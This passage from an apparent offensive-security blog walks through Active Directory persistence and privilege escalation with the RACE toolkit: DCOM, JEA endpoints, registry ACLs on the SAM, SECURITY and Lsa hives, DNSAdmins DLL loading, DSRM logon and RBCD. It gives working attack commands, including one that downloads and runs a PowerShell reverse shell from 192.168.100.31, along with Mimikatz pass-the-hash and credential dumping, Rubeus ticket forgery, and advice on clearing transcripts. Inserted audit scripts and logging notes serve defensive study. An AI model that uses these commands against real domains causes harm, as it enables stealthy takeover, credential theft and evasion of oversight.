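    if (-not (Test-Path -LiteralPath $Path)) { Write-Warning "$Path not found"; return }

    foreach ($rule in (Get-Acl -LiteralPath $Path).Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        $mask = [int]$rule.RegistryRights
        $canWrite = (($mask -band [int]$WriteRights) -ne 0) -or (($mask -band $GenericWrite) -ne 0)
        if (-not $canWrite) { continue }
        [pscustomobject]@{
            Key        = $Path
            Identity   = $rule.IdentityReference.Value
            Rights     = $rule.RegistryRights
            Inherited  = $rule.IsInherited
            Suspicious = $ExpectedIdentities -notcontains $rule.IdentityReference.Value
        }
    }
}

$KeysToAudit | ForEach-Object { Get-RegistryKeyWriters -Path $_ } |
    Where-Object Suspicious | Format-Table -AutoSize
```

A non-inherited SetValue or FullControl entry for a single domain user on the winreg key or an IFEO subkey is exactly the change the commands above make, and is worth comparing against Event ID 4657 (registry value modified) if object auditing is enabled.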
<br />
<h4 style="text-align: left;">
Persistence - DCOM</h4>
<div style="text-align: justify;">
We can modify the ACL of the DCOM endpoint (recall that we already did that while abusing WMI) for persistence. Like WMI, we will have command execution with the privileges of only the current user. But as we will see soon, something like that is very helpful when chained with other ACL modifications. </div>
<br />
<div style="text-align: justify;">
Run the below command with admin rights on the target machine to modify ACL of DCOM endpoint:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCOMPermissions -UserName labuser -ComputerName ops-mssql -Verbose
</textarea></pre>
<div style="text-align: justify;">
Now, run the below command as labuser to execute commands using DCOM on the target machine. By default, the method used for execution is the <a href="https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/">MMC20.Application</a> class.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-DCOMAbuse -ComputerName ops-build -Method MMC20 -Arguments 'iex(iwr -UseBasicParsing http://192.168.100.31:8080/Invoke-PowerShellTcp.ps1)'
</textarea></pre>
<br />
<h4 style="text-align: left;">
On demand Privilege Escalation - Just Enough Administration (JEA)</h4>
<div style="text-align: justify;">
JEA is a PowerShell v5 feature which provides control over administrative tasks by providing a PowerShell Remoting endpoint with:</div>
<div style="text-align: justify;">
- Virtual accounts - temporary local accounts which are local admin on member machines and DA on DCs but no rights to manage resources on network. </div>
<div style="text-align: justify;">
- Ability to limit the cmdlets and commands which a user can run through Role Capabilities. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
JEA is designed to 'allow non-admins to do some admin tasks' with 'least privileges'. This is precisely what we have been doing so far. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, JEA provides admin rights to anyone who is explicitly allowed to connect to the endpoint. What keeps those administrative rights in check is the restriction on the commands and cmdlets that can be executed: a JEA session starts in NoLanguage mode and only explicitly allowed commands and cmdlets are permitted. It is possible to allow only a single command with only one parameter or argument!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
JEA endpoints also have transcripts enabled, so all commands and their output are written to a flat text file. In addition, Event logs for 'WinRM Virtual Users\WinRM_VA_<i>AccountNumber</i>_<i>domain_username</i>' will be generated. PowerShell script block logging may also capture suspicious activity. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With all these checks, how can we abuse JEA? Look at the <a href="https://docs.microsoft.com/en-us/powershell/jea/security-considerations">JEA Security Considerations</a> for some evil ideas ;) </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With admin privileges on the target machine, we can Register a new JEA endpoint, allow all the cmdlets and commands and allow a user we control to connect to it. We can set the transcript log path to user's temp directory and clear the transcripts when we connect to the machine. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's use this against a DC. Run the below command with DA privileges to create a JEA Endpoint 'microsoft.powershell64' which allows access to labuser:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-JEAPermissions -ComputerName ops-dc -SamAccountName labuser -Verbose
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpyYY76yS1f7DXENfOtJXh4CO6csohyphenhypheneftPvzbdKlL-nmOgbgXMwGS82uFWz9GkG-KWzCCuyqrfo9fvcii9Wclabgc-iVfTHN6a6qhebBcZ-yyh9z28I66SNi4bshy7PVr_WwROP_V4W8/s1600/JEA-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="1403" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpyYY76yS1f7DXENfOtJXh4CO6csohyphenhypheneftPvzbdKlL-nmOgbgXMwGS82uFWz9GkG-KWzCCuyqrfo9fvcii9Wclabgc-iVfTHN6a6qhebBcZ-yyh9z28I66SNi4bshy7PVr_WwROP_V4W8/s400/JEA-1.png" width="400" /></a></div>
Now, as labuser we can access the DC and get DA privileges in the local context:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Enter-PSSession -ComputerName ops-dc -ConfigurationName microsoft.powershell64
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiKZNAvnBwOHeoxv4oeJzevkFOjy3QQfF8o8wtPJUh1SoeNO9ozuPmsq9Rp-SL1RfkI2xM_xzO5sS1LqYAFmr7_6zfJeX9glJzmV3lfHrPKy0059USSaG0K-b22vcM3jD2unleVLEG6jA/s1600/JEA-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="814" data-original-width="1098" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiKZNAvnBwOHeoxv4oeJzevkFOjy3QQfF8o8wtPJUh1SoeNO9ozuPmsq9Rp-SL1RfkI2xM_xzO5sS1LqYAFmr7_6zfJeX9glJzmV3lfHrPKy0059USSaG0K-b22vcM3jD2unleVLEG6jA/s400/JEA-2.png" width="400" /></a></div>
Neat, isn't it!<br />
<br />
Below is a video of the attack:<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/D7mgKfPdxOg" width="560"></iframe><br />
<br />
<br />
Please note that there are no logs for new session registration. But there are Events 4624, 4634 and 4717 when we access the target machine. Also, keep in mind the PowerShell logs.<br />
<br />
The best way to defend against JEA abuse really is to audit the registered session configurations and role capabilities. Good guidance on <a href="https://docs.microsoft.com/en-us/powershell/jea/audit-and-report">how to audit and report on JEA is here</a>. </div>
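As an added example (not part of RACE or of the original post), the PowerShell below performs the kind of session-configuration audit the guidance above describes: it lists every registered endpoint and flags ones with a Microsoft-looking but non-default name, unexpected principals in the permission string, a virtual account combined with FullLanguage, or transcripts written to a Temp path. The endpoint and principal allow-lists are assumptions to tune for your own baseline.

```powershell
# Added audit example, not from the RACE toolkit. Run with local admin rights
# (Get-PSSessionConfiguration requires them). Allow-lists below are assumptions.
function Get-SuspiciousPSSessionConfiguration {
    [CmdletBinding()]
    param(
        # Principals that may legitimately appear in an endpoint's Permission string.
        [string[]]$ExpectedPrincipals = @('BUILTIN\Administrators',
                                          'BUILTIN\Remote Management Users',
                                          'NT AUTHORITY\INTERACTIVE'),
        # Endpoint names Windows registers by itself.
        [string[]]$DefaultEndpoints = @('microsoft.powershell',
                                        'microsoft.powershell32',
                                        'microsoft.powershell.workflow',
                                        'microsoft.windows.servermanagerworkflows')
    )

    foreach ($cfg in Get-PSSessionConfiguration) {
        $reasons = New-Object System.Collections.Generic.List[string]

        # Names that mimic a built-in endpoint (the post used 'microsoft.powershell64').
        if ($cfg.Name -like 'microsoft.*' -and $DefaultEndpoints -notcontains $cfg.Name) {
            $reasons.Add('non-default endpoint with a Microsoft-looking name')
        }

        # Permission is a friendly string such as
        # 'BUILTIN\Administrators AccessAllowed, CONTOSO\labuser AccessAllowed'.
        $grants = @()
        if ($cfg.Permission) {
            $grants = ($cfg.Permission -split ',\s*') |
                ForEach-Object { ($_ -replace '\s+Access(Allowed|Denied)$', '').Trim() }
        }
        $unexpected = @($grants | Where-Object { $ExpectedPrincipals -notcontains $_ })
        if ($unexpected.Count -gt 0) {
            $reasons.Add("unexpected principals: $($unexpected -join ', ')")
        }

        # Endpoints registered from a .pssc file expose its keys as properties;
        # the built-in endpoints do not have them, hence the existence checks.
        $props = $cfg.PSObject.Properties
        if ($props['RunAsVirtualAccount'] -and $cfg.RunAsVirtualAccount -and
            $props['LanguageMode'] -and $cfg.LanguageMode -eq 'FullLanguage') {
            $reasons.Add('runs as a virtual account (local admin) with FullLanguage')
        }
        if ($props['TranscriptDirectory'] -and $cfg.TranscriptDirectory -match '\\Temp\\') {
            $reasons.Add("transcripts go to a user-writable path: $($cfg.TranscriptDirectory)")
        }

        # For each unexpected principal, count what the endpoint actually lets them run.
        foreach ($p in $unexpected) {
            try {
                $caps = Get-PSSessionCapability -ConfigurationName $cfg.Name -Username $p -ErrorAction Stop
                $reasons.Add("$p can run $(@($caps).Count) commands")
            } catch {
                $reasons.Add("$p capability check failed: $($_.Exception.Message)")
            }
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Endpoint   = $cfg.Name
                Permission = $cfg.Permission
                Reasons    = ($reasons -join '; ')
            }
        }
    }
}

Get-SuspiciousPSSessionConfiguration | Format-List
```

Run it against each host (for example through Invoke-Command) and compare the output with the list of endpoints you actually deployed.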
<div style="text-align: justify;">
</div>
<br />
<div style="text-align: justify;">
<h4>
Persistence - Registry</h4>
</div>
<div style="text-align: justify;">
The Windows registry stores many interesting credentials: the machine account, local users and cached domain credentials. By modifying the ACL of the registry keys where these credentials are stored, it is possible to access them without needing admin privileges later on. We need to modify permissions of the following registry keys:<br />
- HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ <br />
- HKLM:\Security\ <br />
- HKLM:\SAM\<br />
<br />
Once we have modified the ACLs of these keys, we can then modify the ACL of Remote Registry, WMI or PowerShell Remoting to access the machine and extract the credentials.<br />
<br />
RACE uses code from the <a href="https://github.com/HarmJ0y/DAMP/">DAMP toolkit</a> for this:<br />
<br />
Use the below command to modify the permissions of the above registry keys and of Remote Registry. We are targeting a DC, so DA privileges are needed:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Add-RemoteRegBackdoor -ComputerName ops-dc -Trustee labuser -Verbose
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU5O-l5nGUP337RWj0FYcKHPqdXudd7EJXrCONs5xTqn9hQEfU5Zz7hjGWq3RHIy9jXXuVZT7tUBKR2SAe5ptcYiUWOs4XqttsgWDMQMND3XPKkzoaxkVG43l9crQsygpvv8u4BHAp_IY/s1600/DAMP-DC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="1439" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU5O-l5nGUP337RWj0FYcKHPqdXudd7EJXrCONs5xTqn9hQEfU5Zz7hjGWq3RHIy9jXXuVZT7tUBKR2SAe5ptcYiUWOs4XqttsgWDMQMND3XPKkzoaxkVG43l9crQsygpvv8u4BHAp_IY/s400/DAMP-DC.png" width="400" /></a></div>
Now, use the below command to extract the machine account hash (uses remote registry):<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Get-RemoteMachineAccountHash -ComputerName ops-dc -Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCRuSZJkxgK2BhqbREbAS18SWXHt86nUh_2GUYa-IOgaax_fc_ZYAOKg-drf2LiKkLx5nrVEuNAuoY1jCozMSayau9HgFsk4hWrTzxqhUQRVYUKXdskzngCO9rHGalZu7uFtpdKICq5PM/s1600/DAMP-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="1026" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCRuSZJkxgK2BhqbREbAS18SWXHt86nUh_2GUYa-IOgaax_fc_ZYAOKg-drf2LiKkLx5nrVEuNAuoY1jCozMSayau9HgFsk4hWrTzxqhUQRVYUKXdskzngCO9rHGalZu7uFtpdKICq5PM/s400/DAMP-labuser.png" width="400" /></a></div>
ICYMI, the machine account of a DC can run the DCSync attack!<br />
<br />
Use the Get-RemoteLocalAccountHash function to extract local account hashes. In case of the DC, this gives the NTLM hash of the DSRM account!<br />
<br />
<br />
Remember that we left a question: how is modifying the ACL of PSRemoting useful? This is a very good example. In case you cannot access Remote Registry (for example, filtered on a firewall), you can modify the ACL of PSRemoting and of the registry keys and extract the secrets from the DC without admin privileges:<br />
<pre><textarea cols="70" readonly="readonly" rows="6" style="background-color: #012456; color: white;">$opsdc = New-PSSession -ComputerName ops-dc
Invoke-Command -FilePath C:\RACE-master\RACE.ps1 -Session $opsdc
Enter-PSSession $opsdc
Get-RemoteMachineAccountHash
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGmTfBFZbIDa0UxNvws3qOsUUW8KqBxqLv6z04fAAiWgKnJvMiMP4oUj1RnFqwoRUWpbzvXpImZqmm0VyFNhyiVYa2cY5wEZBVKVicZsUtR3ImFyUhCOo9midSqYFZKa457jCTanMBio/s1600/DAMP-labuser-RACE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="222" data-original-width="889" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGmTfBFZbIDa0UxNvws3qOsUUW8KqBxqLv6z04fAAiWgKnJvMiMP4oUj1RnFqwoRUWpbzvXpImZqmm0VyFNhyiVYa2cY5wEZBVKVicZsUtR3ImFyUhCOo9midSqYFZKa457jCTanMBio/s400/DAMP-labuser-RACE.png" width="400" /></a></div>
Sweet!<br />
Below is a video of the attack:<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/nHhebfX78B0" width="560"></iframe><br />
<br />
Note that there is no log for change in permission of the registry keys. But as for the other attacks, there will be 4624 and 4634 log entries when accessing the DC.<br />
<br />
<h4>
On demand Privilege Escalation on DC - DNSAdmins</h4>
DNSAdmins is an AD security group which has the capability to load arbitrary DLLs from a UNC path in the DNS service. See <a href="https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83">this post</a> and <a href="http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html">my post</a>. This group is effectively DA equivalent if DNS service is running on a DC.<br />
<br />
The group has Read, Write, Create All Child objects, Delete Child objects, Special Permissions on the DNS Server object. We can either:<br />
- Modify ACL of the DNS Server object to have the same rights as the DNSAdmins group to abuse the DLL configuration feature.<br />
<br />
or<br />
<br />
- Modify the ACL of the DNSAdmins group because it is not a Protected Group (ACL not protected by AdminSDHolder)<br />
<br />
Let's modify the ACL of the DNS Server object to be able to load DLL remotely and also provide service start and stop rights on the DNS service for a user we control. Use the below command:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">Set-DNSAbusePermissions -SAMAccountName labuser -DistinguishedName 'CN=MicrosoftDNS,CN=System,DC=offensiveps,DC=powershell,DC=local' -ComputerName ops-dc -Verbose
</textarea></pre>
Now, use the below command as labuser to load mimilib.dll from Mimikatz into the DNS service. Please note that the DNSServer module from DNS RSAT is required for the below command:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-DNSAbuse -ComputerName ops-dc -DLLPath \\ops-build\dll\mimilib.dll -Verbose
</textarea></pre>
</div>
<br />
<h4>
On demand Privilege Escalation on DC - DSRM Administrator </h4>
<div style="text-align: justify;">
The DSRM administrator is a special 'local administrator' account on a DC. This is <a href="https://adsecurity.org/?p=1785">very useful for persistence</a> as its password is seldom changed. By default, this user cannot log on from the network. But this logon behavior can be changed by setting the registry value HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior to 2.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This means, once we have DA privileges, we can:</div>
<div style="text-align: justify;">
- Extract the hash for DSRM administrator (Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"') or we can also chain this with modification of registry keys, as discussed previously, to obtain the DSRM hash without admin privileges. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
- Modify the permissions of the above registry key so that a user we control can change it on demand.</div>
<div style="text-align: justify;">
- Use Mimikatz PTH to connect to the DC.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's try it. Run the below command to modify the DsrmAdminLogonBehavior registry key and allow labuser to modify it anytime. If the key doesn't exist, it is created:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCPermissions -Method DSRMAdmin -SAMAccountName labuser -Server ops-dc -Verbose
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOec03j_OhywX0eXBaXewBO_dDOKXYUWF37PWjg-rswlm6QwDK5fne_Q9Q6_x022xdFeTHfd5itEKyWFiSu977gGbylb7OMb-rO976QWcPBfN1Ng-Q31uyT8o9s7PWz-SdKpdl8LnHiQ0/s1600/DSRM-DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="145" data-original-width="1563" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOec03j_OhywX0eXBaXewBO_dDOKXYUWF37PWjg-rswlm6QwDK5fne_Q9Q6_x022xdFeTHfd5itEKyWFiSu977gGbylb7OMb-rO976QWcPBfN1Ng-Q31uyT8o9s7PWz-SdKpdl8LnHiQ0/s400/DSRM-DA.png" width="400" /></a></div>
As labuser, we can modify the registry key. Note that this needs to be coupled with modification of ACL of a remote access method (PSRemoting, WMI, Remote Registry or DCOM). Let's use PSRemoting for that:</div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;"># Set-ItemProperty takes -Type; -PropertyType belongs to New-ItemProperty
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -Type DWord
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTG-j4sCC3vNrRoC7LKOGkuaLpgdctHOIuwmAaeFOKpYajg0VKeLwtzXRTSxio7uUpJpDm_barP677jvOtJwo4zdrM0cWDnDhwor_tIS_lbK6BdWF-SyQlRPTcw9lVxivKLN5Nuot6Mo/s1600/DSRM-User.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="86" data-original-width="1600" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTG-j4sCC3vNrRoC7LKOGkuaLpgdctHOIuwmAaeFOKpYajg0VKeLwtzXRTSxio7uUpJpDm_barP677jvOtJwo4zdrM0cWDnDhwor_tIS_lbK6BdWF-SyQlRPTcw9lVxivKLN5Nuot6Mo/s400/DSRM-User.png" width="400" /></a></div>
<br />
Now, we can use PTH (note the /domain parameter in the below command) to access the DC. We need to use NTLM authentication to access the DC as we are using a local account:</div>
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">Invoke-Mimikatz -Command '"sekurlsa::pth /domain:ops-dc /user:Administrator /ntlm:<ntlmhash> /run:powershell.exe"'
Enter-PSSession ops-dc -Authentication Negotiate </textarea></pre>
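As an added example (not from RACE or DAMP, and not part of the original post), the PowerShell below audits the two things the Persistence - Registry and DSRM sections depend on: it reports every ACE on the Lsa, SECURITY and SAM keys that is held by something other than a built-in principal, and it reports the DsrmAdminLogonBehavior value. It assumes Windows PowerShell 5.1, administrator rights on the target (admins keep READ_CONTROL on SAM and SECURITY even though they cannot read the contents), and the Remote Registry service for remote hosts; the built-in SID list is an assumption to tune against your baseline.

```powershell
# Added audit example, not from RACE or DAMP. Windows PowerShell 5.1 assumed.
function Get-CredentialKeyAudit {
    [CmdletBinding()]
    param([string]$ComputerName = $env:COMPUTERNAME)

    # Well-known SIDs that legitimately appear on these keys (assumption: tune per baseline).
    $builtin = @('S-1-5-18', 'S-1-5-32-544', 'S-1-3-0', 'S-1-5-32-545',
                 'S-1-5-11', 'S-1-15-2-1', 'S-1-5-19', 'S-1-5-20')
    $keys = @('SYSTEM\CurrentControlSet\Control\Lsa', 'SECURITY', 'SAM')

    $hklm = if ($ComputerName -eq $env:COMPUTERNAME) {
        [Microsoft.Win32.Registry]::LocalMachine
    } else {
        [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(
            [Microsoft.Win32.RegistryHive]::LocalMachine, $ComputerName)
    }
    try {
        foreach ($path in $keys) {
            # Open with ReadPermissions only: SAM and SECURITY deny read access to
            # administrators but still let them read (and change) the DACL.
            $key = $hklm.OpenSubKey($path,
                [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadSubTree,
                [System.Security.AccessControl.RegistryRights]::ReadPermissions)
            if (-not $key) { Write-Warning "$ComputerName : cannot open HKLM\$path"; continue }
            try {
                $acl = $key.GetAccessControl()
                $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
                foreach ($ace in $rules) {
                    $sid = $ace.IdentityReference.Value
                    if ($builtin -contains $sid) { continue }
                    try { $name = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
                    catch { $name = $sid }
                    [pscustomobject]@{
                        ComputerName = $ComputerName
                        Key          = "HKLM\$path"
                        Finding      = 'ACE for a non-builtin principal'
                        Principal    = $name
                        Rights       = $ace.RegistryRights.ToString()
                        Inherited    = $ace.IsInherited
                    }
                }
            } finally { $key.Close() }
        }

        # DsrmAdminLogonBehavior: absent or 0 is the default; 2 allows network logon
        # with the DSRM password, which is what the post's on-demand escalation needs.
        $lsa = $hklm.OpenSubKey('SYSTEM\CurrentControlSet\Control\Lsa')
        $behavior = $lsa.GetValue('DsrmAdminLogonBehavior')
        $lsa.Close()
        if ($behavior -and $behavior -ne 0) {
            [pscustomobject]@{
                ComputerName = $ComputerName
                Key          = 'HKLM\SYSTEM\CurrentControlSet\Control\Lsa'
                Finding      = "DsrmAdminLogonBehavior = $behavior"
                Principal    = $null
                Rights       = $null
                Inherited    = $null
            }
        }
    } finally { $hklm.Close() }
}

Get-CredentialKeyAudit -ComputerName ops-dc | Format-Table -AutoSize
```

Because these changes leave no event by default, a scheduled run of this check on every DC is the practical substitute until SACL-based auditing of the keys is in place.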
<h4 style="text-align: left;">
Persistence using DC - Resource-based Constrained Delegation (RBCD)</h4>
<div style="text-align: justify;">
Resource-based Constrained Delegation enables the resource owner to set delegation to it. Unlike the traditional Delegation, DA privileges are not required to set RBCD.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As per <a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#generic-dacl-abuse">this post, for Generic DACL abuse</a> of RBCD, if a user we control has Write permissions on a computer object, that user can configure RBCD on the machine. This allows access to the target machine as any user, including DA. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Use the below command to give labuser permissions to configure RBCD on 'ops-file' by modifying the ACLs of ops-file computer object. This will need DA privileges:</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">Set-DCPermissions -Method RBCD -DistinguishedName 'CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=local' -SAMAccountName labuser -Verbose
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO6fe28BgMMGBVs8W27UygZ3YTPkjsdYR4Kx5vYgfGuRhAPSXcgUx7Io9GDTex-bO6_zisLRoV4w3vKToQJbYU8sKFzAtqxvRfIZneFu3hGClolepy0Uf6p96eE1YUxYRSxZSOPkCX3nU/s1600/RBCD-DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="1600" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO6fe28BgMMGBVs8W27UygZ3YTPkjsdYR4Kx5vYgfGuRhAPSXcgUx7Io9GDTex-bO6_zisLRoV4w3vKToQJbYU8sKFzAtqxvRfIZneFu3hGClolepy0Uf6p96eE1YUxYRSxZSOPkCX3nU/s400/RBCD-DA.png" width="400" /></a></div>
As labuser, run the below command (needs the ActiveDirectory module) to configure RBCD from attacker machine ops-user1$ to ops-file. This enables us to access ops-file as any user when we impersonate the ops-user1 machine:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-ADComputer -Identity ops-file -PrincipalsAllowedToDelegateToAccount ops-user1$
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR39s3XgB2_BxNrxhhNSDS7RlpU_5BSUn5AJrVLLwbhRmMgHfGA8AzhRo5kZG_XcBHK9r8zW-AvRQo_C6JTlgvSjE2ArxA0clctxin29dBuhaQdOqIVAu-RkN2Z3bxAN2JebST9jzgKBY/s1600/RBCD-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="125" data-original-width="1600" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR39s3XgB2_BxNrxhhNSDS7RlpU_5BSUn5AJrVLLwbhRmMgHfGA8AzhRo5kZG_XcBHK9r8zW-AvRQo_C6JTlgvSjE2ArxA0clctxin29dBuhaQdOqIVAu-RkN2Z3bxAN2JebST9jzgKBY/s400/RBCD-labuser.png" width="400" /></a></div>
We can extract the AES256 keys for the ops-user1$ account by dumping credentials on that machine (Invoke-Mimikatz -Command '"sekurlsa::ekeys"'). </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now, we can use <a href="https://github.com/GhostPack/Rubeus/">Rubeus</a> to impersonate a DA which effectively means local admin on ops-file.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">.\Rubeus.exe s4u /user:ops-user1$ /aes256:AES256KeyofUser1$ /msdsspn:cifs/ops-file /impersonateuser:administrator /ptt
</textarea></pre>
<div style="text-align: justify;">
Please note that we are merely impersonating the DA for accessing ops-file. We cannot access any other machine from ops-file as DA. </div>
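As an added example (not from RACE or the post), the PowerShell below enumerates both sides of the RBCD exposure discussed above: computer objects that already have principals allowed to delegate to them, and principals that could configure it because they hold WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity or a broader control right on the computer object. It assumes the ActiveDirectory module and its AD: drive for the current domain, the attribute's schemaIDGUID as shown, and an expected-writer list that is an assumption to tune for your forest.

```powershell
# Added audit example, not from RACE. Requires the ActiveDirectory module.
function Get-RbcdExposure {
    [CmdletBinding()]
    param(
        [string]$Server = $env:USERDNSDOMAIN,
        # Principals whose write access on computer objects is expected (assumption: tune per forest).
        [string[]]$ExpectedWriters = @('Domain Admins', 'Enterprise Admins', 'Administrators',
                                       'SYSTEM', 'Account Operators', 'SELF',
                                       'Key Admins', 'Enterprise Key Admins')
    )
    Import-Module ActiveDirectory -ErrorAction Stop
    $ADR = [System.DirectoryServices.ActiveDirectoryRights]
    # schemaIDGUID of msDS-AllowedToActOnBehalfOfOtherIdentity
    $rbcdAttr = [guid]'3f78c3e5-f79a-46bd-a0b8-9d18116ddc79'
    # Rights that include the ability to write that attribute (or to grant it to oneself).
    $broadMask = [int]($ADR::GenericAll -bor $ADR::GenericWrite -bor $ADR::WriteDacl -bor $ADR::WriteOwner)

    $computers = Get-ADComputer -Server $Server -Filter * -Properties PrincipalsAllowedToDelegateToAccount
    foreach ($c in $computers) {
        # 1. RBCD already configured: who may act on behalf of other identities to this host?
        foreach ($dn in $c.PrincipalsAllowedToDelegateToAccount) {
            [pscustomobject]@{
                Computer  = $c.Name
                Finding   = 'RBCD configured'
                Principal = $dn
                Rights    = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
            }
        }
        # 2. Who could configure it: explicit write on the attribute, an unscoped
        #    WriteProperty, or a broad control right. Property sets are not expanded.
        $acl = Get-Acl -Path "AD:\$($c.DistinguishedName)"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $id = $ace.IdentityReference.Value
            if ($ExpectedWriters | Where-Object { $id -like "*\$_" }) { continue }
            $rights = [int]$ace.ActiveDirectoryRights
            $writesAttr = (($rights -band [int]$ADR::WriteProperty) -ne 0) -and
                          ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $rbcdAttr)
            $broad = ($rights -band $broadMask) -ne 0
            if ($writesAttr -or $broad) {
                [pscustomobject]@{
                    Computer  = $c.Name
                    Finding   = 'Can configure RBCD'
                    Principal = $id
                    Rights    = $ace.ActiveDirectoryRights.ToString()
                }
            }
        }
    }
}

Get-RbcdExposure | Sort-Object Finding, Computer | Format-Table -AutoSize
```

The 'Can configure RBCD' rows are the ACEs an attacker with DA would add; the 'RBCD configured' rows are what is left behind once the attribute has been set.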
<br />
<h4 style="text-align: justify;">
